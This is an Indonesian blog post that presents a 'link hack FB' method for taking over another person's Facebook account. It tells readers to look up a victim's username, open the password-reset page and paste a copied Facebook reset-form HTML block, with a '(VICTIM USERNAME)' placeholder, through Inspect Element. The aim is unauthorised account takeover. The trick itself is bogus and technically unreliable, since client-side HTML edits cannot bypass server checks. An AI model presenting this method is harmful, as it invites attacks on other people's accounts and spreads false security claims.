Link Hack FB 2024

Link Hack FB - Pernah nggak si sebelumnya anda berfikiran untuk melakukan hack akun FB milik orang lain? Ya bisa dibilang mungkin ini merupakan suatu tindakan atau kegiatan yang sangat dilarang untu para pengguna FB.

Menlakukan hack akun FB milik orang lain ini bukan merupakan hal yang terbilang mudah, apalagi sekarang ini pihak developer FB terus menerus untuk memperkuat keamanan setiap para pengguna nya.

Dan bahkan ada banyak pengguna yang rela mengelurakan uang untuk membayar peenyewa jasa hacker atau peretasan demi memeperoleh kata sandi aku FB milik orang lain.


Akan tetapi, bagaimana jika akun FB milik anda yang diubah kata sandinya atau mungkin dicuri oleh orang lain yang tidak memiliki rasa tanggung jawab?

Pastinya anda tidak mau, jika akun FB anda tersebut disalah gunakan atau di bajak untuk hal-hal yang tidak-tidak oleh mereka.

Oleh dari itu, anda dapat mengatasi masalah yang ada tersebut dengan mengikuti cara hack melalui link hack FB yang berikut ini.

Link Hack FB dengan Script HTML

Link Hack FB
Untuk cara melakakuna hack atau mengambil alih akun Facebook milik anda yang sudah dihack orang laing melalui link link HTML.

Dan penasaran bagaimana caranya? Yuk langsung saja ke langkah-langkah cara hack menggunakan link hack FB dengan Script HTML berikut ini:
  • Langkah pertama, silahkan anda dapat Login atau Masuk ke akun Facebook.
  • Sesudah itu, anda dapat langsung saja mencari dan juga menyimpan username pengguna atau akun orang yang mau di hack.
  • Jika anda kesulitan atau merasa bingung untuk mencari ID atau username pengguna tersebut, maka anda bisa memakai tools yang sudah tersedia pada halaman situs www.lookup-id.com.
  • Setelah itu anda dapat logout dari akun Facebookmu.
  • Selanjutnya di laman login yang awal, silahkan untuk anda klik saja opsi lupa kata sandi atau password.
  • Nah jika telah berhasil masuk, nanti anda akan ada melihat sebuah laman cari akun, dan disini anda bisa masukkan username akun si korban, setelah itu tap Cari atau Search.
  • Jika sudah melakukannya, maka nantinya sistem dari FB akan langsung mencari akun yang sama dengan username korban yang sudah anda masukkan
  • Nah pada halaman opsi reset password FB ini, anda klik sebelah kanan pada bagian mouse, lalu pilih menu Inspect Element
  • Jika telah berhasil masuk ke dalam laman opsi Inspect Element, anda klik opsi Edit Html, kemudian copy paste atau tempel script HTML hack yang berikut ini:
<form method="post" action="/recover/password?u=(VICTIM USERNAME)&n=389548" onsubmit="return window.Event && Event.__inlineSubmit && Event.__inlineSubmit(this,event)" id="u_0_4"><input type="hidden" name="lsd" value="AVoH0gpvlk4" autocomplete="off"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Choose a new password</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Choose a new password</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="mvm uiP fsm">A strong password is a combination of letters and punctuation marks. It must be at least 6 characters long.</div><table class="uiInfoTable" role="presentation"><tbody><tr class="dataRow"><th class="label"><label for="password_new">New Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_new" name="password_new" tabindex="1" autocomplete="off"><label class="mls uiButton" for="u_0_0"><input value="?" onclick="show_pwd_help(); return false;" tabindex="3" type="button" id="u_0_0"></label><div id="password_new_status"></div></td></tr><tr class="dataRow"><th class="label"><label for="password_confirm">Confirm Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_confirm" name="password_confirm" tabindex="2" autocomplete="off"><div id="password_confirm_status"></div></td></tr></tbody></table><div class="mvl"><div class="mvm">To make sure your account's secure, we can log you out of any other computers and phones. You can log back in with your new password.</div><div class="mvm"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" checked="1" name="reason" value="kill_sessions" onclick="CSS.hide(ge("chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_1"><label for="u_0_1" class="uiInputLabelLabel">Log me out of other devices</label></div><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" name="reason" value="keep_sessions" onclick="CSS.show(ge("chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_2"><label for="u_0_2" class="uiInputLabelLabel">Keep me logged in</label></div></div><div class="mtm hidden_elem" id="chpw_survey_hacked_warn" style="color:red;">If your account was hacked, please select "Log me out of other devices"</div></div></div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class="uiButton uiButtonConfirm" id="btn_continue" for="u_0_3"><input value="Continue" name="btn_continue" type="submit" id="u_0_3"></label><a class="uiButton" href="/" role="button" name="reset_action"><span class="uiButtonText">Cancel</span></a></div><div class="pts"></div></div></div></div></form>
  • Untuk mendowmload script html hack kata sandi FB tersebut, maka anda dapat mengunduh atau saimpan dengan cara copy paste ke dalam file txt pada perangkat PC.
  • Nah jika anda telah Copy dan Paste atau tempel kode yang ada di atas ini, maka silahkan tekan enter.
  • Dan nantinya sistem FB akan secara otomatis untuk melakukan konfirmasi anda buat menginput password FB yang terbaru
  • Dan selesai!

Cara yang kali ini masih dibilang kecil kemungkinan untuk bisa berhasil, mengapa? Ya sebab disaat proses memasukkan username atau ID , pihak FB akan langsung mengirimkan anda sebuah notifikasi ke dalam pemilik asli.

Hal tersebutlah yang tidak mudah, dan nanti bisa-bisa akses itu ditolak, karena untuk sistem keamanan dari Facebook ini sendiri sangat kuat.

Dan sekali lagi, kami tidak bisa menjamin jika cara ini akan berhasil, dan tetap mau mencobanya maka anda jangan sampai terlalu berharap.

Itulah keseluruhan bahasan kita pada artikel kali ini tentang link hack FB. Sekian dan selamat mencoba.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel